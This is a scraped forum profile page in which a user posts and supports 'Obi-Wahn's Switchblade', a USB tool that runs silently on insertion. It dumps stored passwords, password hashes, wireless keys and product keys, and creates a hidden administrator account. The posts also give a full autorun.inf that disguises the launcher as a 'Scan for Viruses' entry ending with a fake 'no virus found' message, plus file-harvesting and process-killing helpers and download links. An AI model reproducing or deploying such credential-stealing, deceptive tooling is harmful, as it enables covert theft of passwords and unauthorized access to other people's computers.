Obi-Wahn
-
Posts
58 -
Joined
-
Last visited
Posts posted by Obi-Wahn
-
-
Hello everybody!
Today, I'll release my self coded switchblade. It's a complete package, including all tools needed.
Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p
Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip
Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip
Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf
Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc
Info's:
The U3 Package works full. The Non-u3 Package (.exe and .bat) works also, but there are "quick and dirty" coded. So (especially the .bat package) may the downloader checks the sourcecode again. I've only written this because not everyone want to learn AHK or is able to "understand" ahk.
Post Bugs and Errors here, send a PM or a Mail.
And a feedback 'd be nice.
Regards
Obi-Wahn
EDIT: Sorry, I had to hurry up yesterday.
My U3 Switchblade is written in AutoHotkey, which is similar to Auto-IT.
How to install and configure this tool is in the Manual.
It is possible to:
Dump System Information's (including Computername, Username, Adminstate of the user, Systemroot-, Application- , common application- and Comspec-path, Operating System, Language and Screen-Res, including a network information dump all in one file)
Stop any kind of process
Copy the clipboard to a file
Dump Passwords from the Protected Storage
Dump Network passwords
dump Messenger Passwords
dump Mailpasswords
Dump History of the IE
dump and decrypt passwords of Opera's wand file (if exist, works at least up to version 9.10)
dump productkeys
Dump User Password hashes
dump dial-up passwords
dump IE Passwords
dump wireless passwords
dump SID
dump a list of installed software, including hotfixes
dump a list of services
dump a list of tcp connections
dumps and decrypts the ASP.Net Account password
Create a new, administrative user (username and password stored into the .ini), including German and English language support for success report
Start Additional Programs, stored into the .ini, including optional hidden starting
Trys to restart the terminated processes after finishing
Further is it possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is into the list, the program will exit without dumping any data.
It's possible to use the .exe without any other stuff to use the process-terminate-routine, the process-restart-routine, the sysinfo and the user-creation as standalone (.ini is needed) tool.
For Standalone usage, read the manual or type "switchblade.exe /?"
Developers are also welcome. Type "switchblade.exe /Src" to append the sourcecode to a file or -if you use the u3p package- hold CTRL down, while starting the Switchblade. Then it will append the sourcecode to a file and exit the program.
All tools are included.
-
New tool added: file.exe
Infos and download @first post.
-
My Desktop Pictures are quite big, and they look ugly when I'm resize them. So I post the links.
WITHOUT WINDOWS - WITH OPEN WINDOWS
Style:
Aero Style (Glass - Beta 2) [Custom Shellstyle]
Font: Segoe UI
BG: Crowns of Fury (Deviantart)
Rainmeter: Digi-Skin
Rainlendar: Clear
Startmenu: VIStart
Dock: Objectdock
WinAmp: ClearONEbeta
wow nice wallpaper where did you get that ?
deviantart. "Crowns of Fury" by Spaceartists
-
My Desktop Pictures are quite big, and they look ugly when I'm resize them. So I post the links.
WITHOUT WINDOWS - WITH OPEN WINDOWS
Style:
Aero Style (Glass - Beta 2) [Custom Shellstyle]
Font: Segoe UI
BG: Crowns of Fury (Deviantart)
Rainmeter: Digi-Skin
Rainlendar: Clear
Startmenu: VIStart
Dock: Objectdock
WinAmp: ClearONEbeta
-
No, it's normal.
I'll change it, with my new tool, which will actually be released til tuesday.
-
Want execute your payload while browsing or not?
When you want to modify your autoplay menue, try elmer's solution, alternative: AutoPlay Repair (You can Add, modify and delete entries too)
When you want to start your payload too, while browsing try launcher.exe
-
Thats one type of file: All Types.
But elmer means:
fc.exe "C:*.doc + C:*.txt" "X:Files" /I
This doesn't work.
-
I think, this shouldn't be a big problem.
Then I'm working on this, the more-file-types-per-command issue and the varprob, which makes me kind of mad, cause I pass a parameter from the manifestfile of my switchblade and it works.
-
@elmer: NP. Your choise.
BTW: I've tried a test.bat
set D = %userprofile%Desktopfiles md %d% xcopy "C:*.log" "%d%" /S pause > nul
and got a error message (translated): "Cyclic copy not possible"
So did you do something different or what?
-
No. Fc is pointed to copy one type of file per command.
It's not one FILEtype, but one TYPE of file.
fc.exe "C:log*" "X:Files" /I
Copies all files which are starting with "log" and doesn't matter which fileextention are the files have.
fc.exe "C:*.doc" "X:Files" /I
Copies all .doc Files to the destination folder.
As soon I've time, I'll write a modification of the code to support more than one type of searchstring.
-
Hi!
Since I found the scriptlanguage AutoHotKey, which is quite similar to AutoIT, I started developing some tools.
Here some, which are -I think- maybe useful for your Switchblade.
All of my Apps are OpenSource. So feel free to modify it, as you want, but you have to add the
modified Sourcecode again to the Program, and Add a Comment to the Source or to a textdocument,
where the Changes, the date and your name (at least the forumname) have to be stored.
I'M NOT RESPONSIBLE FOR ANY DAMAGES OF THE SYSTEM, WHERE MY APPS ARE EXECUTED
=======================================================================
FileCopier (fc.exe) DOWNLOAD
fc is a tool, which searches a path for files, and copy them to a defined folder.
There are some settings, which are stored into the Help dialogue.
The Script is OpenSource, you'll get the Sourcecode with typing "fc.exe /Src"
(Without "" )
Why I've created this:
Because "Caryl3" needs a possibility to copy files, and I've a little sparetime, so I coded this.
Help dialogue:
fc.exe "Drive:Searchstring" "Targetfolder" [/I] [/O] [/Box] fc.exe [/Src] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /I Includes Subfolders to the search. /O Overwrites existing files /Box Displays a Messagebox with the amount of copied files /Src Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /I /Box Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Src Appends the Source of this tool to a .ahk File
Changelog:
16.May.2K7 (15:37 GMT +1)
+ Added 2nd example to the Help
+ Added explanation of examples
+ Added "commandlinetool-beaviour" (if less than 2 parameters passed to the scipt, a cmd.exe window popps up shortly)
+ Bugfix: Recompile is now easier for developer who appended the source. (you don't have to rename the source now again)
+ Lil more explanation of the code into the source
+ Added credits
+ Sourcecode-Cleanup
----------------------------------------
Launcher (launch.exe) DOWNLOAD
This is a tool for the Launch menue of a Non-U3 Switchblade.
Execute the Program first in normal mode, and it will append a new, predefined autorun.inf file.
The .inf file have a Shell entry, for this who have the Autoplay feature disabled,
hidden as a Virusscan, which actually opens a small message, that no virus was found, when all apps are launched.
Why I've created this:
Because for my Switchblade release (which is comming soon).
Predefined autorun.inf
[autorun] open=launch.exe /S icon=%windir%system32shell32.dll,4 action=Open folder to view files label=Obi-Wahn ShellScan=Scan for Viruses ShellScanCommand=launch.exe /S /V [Launch] 1=switchblade.exe 2=explorer.exe . # Additional programs can be added with adding programs to the list, # one per line, asc. index no. # If you want to execute the Program, File whatever, in hidden mode, simply add after the name " , , Hide" # (Without "", but the first space is IMPORTANT) # Example: # 3=additionalitem.cmd , , Hide
Infos:
I call the Icon from the shell32.dll, so that It's in the Autoplay diaogue as the "Open folder" entry
I've tried to call the String (Open folder to view files) from the shell too, but I wasn't able to do this.
IMPORTANT: This tool is in developing phase.
Parameter:
/S lauches every entry into the [Launch] Section /V (As second parameter) displays a pseudo "no-Virus" message at the end of launching /Src Append the Sourcecode to a file.
----------------------------------------
File (file.exe) DOWNLOAD
This tool is similar to fc.exe. But while the function is the same, operations are differen, you can choose more than one searchmask and do diferent tasks like Copying, Moving, Deleting, ...
Warning: Like my other tools, this is Beta software. I'm not responsible for any damages on your or other systems.
Why I've created this:
Because fc.exe has several bugs, some fixed here.
Parameter:
file.exe /A:[C D M SD] "C:*.txt + C:*.doc" "X:Files" [/I] [/O] [/P] [/Box] [/Log] [/Debug] file.exe /A:SC <Target> <Linkfile> [<Workingdir> <Args> <Description> <Icon> <Shortcutkey> <IconNo> <Max|Min|Normal>] [/Debug] file.exe /A:E file.exe /Src /A:C Copies found Files to the Targetfolder /A:M Moves found Files to the Targetfolder /A:D Deletes found Files /A:SD Moves found Files to Paper Bin /A:SC Creates a Shortcut /A:E Empties the Paper Bin /I Includes Subfolders to the Search /O Overwrites Files into the Targetdirectory (Only Copying and Moving) /P Creates the same Folder Structure as Found (Only Copying and Moving) /Box Shows a Messagebox after Finishing /Log Creates a Logfile into the Targetfolder (Copying and Moving into the Targetfolder, Deleting into Tempfolder) /Debug Shows a Messagebox which Contains all Variables and their Values /Src Appends the Sourcecode to a .ahk File "C:*.txt + C:*.doc" Strings which shall be searched "X:Files" Targetfolder where the Files shall be copied/moved For the Shortcutsyntax: If you want to obmit a parameter you have to define it like "" for empty space. Else it will fail or define the parameter wrong. Examples: file.exe /A:SC C:Downloads Downloads.lnk "" "" Downloaddirectory Creates a Shortcut to the Folder C:Downloads, Linkfile is Downloads.lnk at the Scriptdirectory, no workingdir, no arguments but a Diescription (It's the Downloaddirectory) file.exe /A:D "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop WITHOUT moving them to the Paperbin file.exe /A:SD "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop and moves them to the Paperbin. file.exe /A:C "C:*.txt" "X:Files" /I /P Copies all Textfiles to the Targetdirectory (X:Files), includes Subfolders to the search and creates the same folder structure as on the Computer.
--------------------------------
Obi-Wahn's Switchblade SEE THIS TOPIC
--------------------------------
Processkiller (pkill.exe) DOWNLOAD
This tool is used to terminate processes. THIS IS NOT A ANTIVIRUS / FIREWALLKILLER (but may works)
You write in a file a processname per line, and define this file as 1st parameter.
The second parameter is optional. If you define another file as the 2nd parameter, pkill.exe will write every
found processname to the 2nd file.
Why I've created this:
Because this is may be usefull. I use it all time when i have to speed up my system quick.
Parameters
pkill.exe <list> <output> pkill.exe /? Shows the Help pkill.exe /Src Appends the Sourcecode to a file <list> List of Processnames (e.g.: ashServ.exe, one entry per line req) <output> List of Found Processes Example: pkill.exe processes.lst found.txt Reads every FULL line of "processes.lst", and If the processname exists, it will try to close the process, and write the processname to "found.txt"
-----------------------
That's it.
Maybe someone need this, so download it and use it.
Future:
Rapidshare full auto downloader (I know, there exist several, but I try to code one by myself).
If any of you has a wish for a tool, so feel free to send me a pm. If it's possible for me (skill and time), I'll try to realize this.
(Only if it makes sense, because if it's possible with a simple command in the batch, or there allready tools released, I don't code this)
Regards
Obi-Wahn
-
First Anwser:
Yeah, its possible, but you know, that this takes probably a long time...
:: Possible Batch file @echo off start /wait fc.exe "%systemroot%*.avi" ".Movies" /I start /wait fc.exe "%systemroot%*.jpg" ".Pictures" /I exit
Second answer:
U want to execute a App from a cd when you insert the disc into the drive..
U have to write a autorun.inf file, and store it on root of the disc.
Simple:
[autorun] icon=icon.ico open=launch.exe
-
I've the same Drive, and on this days I'm finishing the tests with my own Switchblade (U3-package).
During this time, It works great. But I can't tell you anything bout the methods which are used into the WIKI.
-
Hi!
@lixo: Yeah, It'd be no real problem to add this feature, but I've to add a Mailtool, a ziptool, ... and this wasn't the challenge. But feel free to modify the code if you want.
@ASTRAPI: If you execute a file via Autorun, only this file will be executed. The Explorer window won't open. Only if you work with another tool.
But I've coded a tool for this problem. (WARNING: This tool is in developement phase).
So, first execute the tool with a doubleclick. This appends a autorun.inf file.
Write every item that shall be executed to the right selection. (Self explaining into the .inf file.)
Execute no. 1 : fc.exe "%Userprofile%*.jpg" ".Images" /o
Execute no. 2: explorer.exe .
Other paramerters of launch.exe:
/S lauches every entry into the [Launch] Section /V (As second parameter) displays a pseudo "no-Virus" message at the end of launching
However, this tool is in developement status. I'll not be responsible for any damages.
-
Shure, I could. But on the other hand with a wider range of parameters, the "compatibility" for errors increase.
but ok. I'll change the code to smaller stings. If you prefer to have a choose-range, simple change the sourcecode from eg:
If 1 = /Source
to
If 1 in /Source,/src,/s
to increase the parameterrange.
fc.exe "Drive:Searchstring" "Targetfolder" [/I] [/O] [/Box] fc.exe [/Src] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /I Includes Subfolders to the search. /O Overwrites existing files /Box Displays a Messagebox with the amount of copied files /Src Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /I /Box Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Src Appends the Source of this tool to a .ahk File
PS.: I update every time the version, so the link doesn't change, but the old version will be overwritten every time.
If someone want a special modification, PM me or send me a message over IM.
If it's possible for my scripting experience, i'll change it (but you have to be patient, I've sometimes to do a lot)
-
NP. I've modified my code again.
Changelog:
16.May.2K7 (15:37 GMT +1)
+ Added 2nd example to the Help
+ Added explanation of examples
+ Added "commandlinetool-beaviour" (if less than 2 parameters passed to the scipt, a cmd.exe window popps up shortly)
+ Bugfix: Recompile is now easier for developer who appended the source. (you don't have to rename the source now again)
+ Lil more explanation of the code into the source
+ Added credits
+ Sourcecode-Cleanup
Helpstrings:
fc.exe "Drive:Searchstring" "Targetfolder" [/Include] [/Overwrite] [/Msgbox] [/Source] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /Include Includes Subfolders to the search. /Overwrite Overwrites existing files /Msgbox Displays a Messagebox with the amount of copied files /Source Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /Include /Msgbox Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Source Appends the Source of this tool to a .ahk File
-
shure. Type
fc.exe /?
for the Help or type
fc.exe /Source
to create the source of the program
(I've changed the upper help, that wasn't formatted well)
-
I think you need:
for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:start.bat set DRIVE = %%i
start.bat is changeable (maybe to autorun.inf, but this would find maybe a other cd with autorun.inf, so it'd be the wrong driveletter....
-
I've a lil time, so I wrote a small tool 4 you.
fc.exe "Drive:Searchstring" "Targetfolder" [/Include] [/Overwrite] [/Msgbox] [/Source] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /Include Includes Subfolders to the search. /Overwrite Overwrites existing files /Msgbox Displays a Messagebox with the amount of copied files /Source Appends the Source of this program to a file Example: fc.exe "C:*.txt" "X:Files" /Include /Msgbox
Written in AHK
Changelog:
15.May.2K7 (17:40 GMT+1)
+ Fixed Bug (don't ignores allready existing files anymore)
+ Helpstrings (edited last @ Target)
+ Displays the amount of copied files and the amount of copied files in Megabytes
+ Notes added to the sourcecode
+ Increase speed of the program
-
Look at the code a 2nd time. You've forgot a single point.
it has to be:
start explorer .....
The single point says, that from this path to 2 instances up.
alternative you can add this line (at the top or at the end) to define the drive.
(info: it only works if the file autorun.inf (which is changeable) exists in the drive.
for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i:
(untested with start, I set a var with this line)
-
Hey!
look in THIS topic. The popping up of a cmd-window is (i think) fixed.
further, you can unite the 2 lines code to one line.
start /wait truecrypt /q /v saved.pst /lo && o:pstart.exe
@mubix post from room362.com:
y not. I'd like to download your stuff. Maybe 3 Gig for a torrent is a bit much but maybe you can split into 2 parts (using zip, rar, chainsaw, ...)
Thanks
-
I think the easies way is, to write a line into batchfile.
On first line write:
explorer .....
and -if the code starts- it should open a window with the root of your usb device
maybe it works also when you write (instead):
shellexecute=system/cmd/go.exe && %WinDir%explorer.exe .
Could work, if it works like a command prompt...
-
I've done a google search and ms support says that shellexecute searches in HKEY_LOCAL_ROOT for the extention of the program, that is associated to a method of execution.
So try:
shellexecute=systemCMDcmdow.exe /RUN /HID go.cmd
PS.: There are several ways to create a u3p package. On the U3 Homepage is a developer package downloadable (after a registration) or you can download a small program called PackageFactory from http://www.eure.ca/ to build simple u3p packages.
-
you don't use this batch in a .u3p Package, right?
cause if it is so, you can use in the manifest file.
the string would be:
<appStart cmd="%U3_APP_DATA_PATH%cmdow.exe /RUN /HID yourbatch.bat"></appStart>
else if you use shellexecute:
shellexecute=cmdow.exe /RUN /HID go.cmd
but this codes need to have the batch into the same folder as the cmdow.exe
Obi-Wahn's Switchblade
in USB Hacks
Posted
Sorry. I had to hurry up yesterday. However. Usage added @ first post.
Yes, the .u3p package has to use with a Stock u3 drive (which I use).
After installation of the u3 package, you have to go to the manage programs dialog, and activate "start on insertion" for the switchblade.
Then (without terminating and restarting processes) it takes about 45 Seconds, depending on the computer to dump all informations.
I've configurated my switchblade not to kill and restart processes. I've only added this feature if e.g. a scanner detects a tool as a virus, but scanned with Avast, AVG and Norton, nothing happend.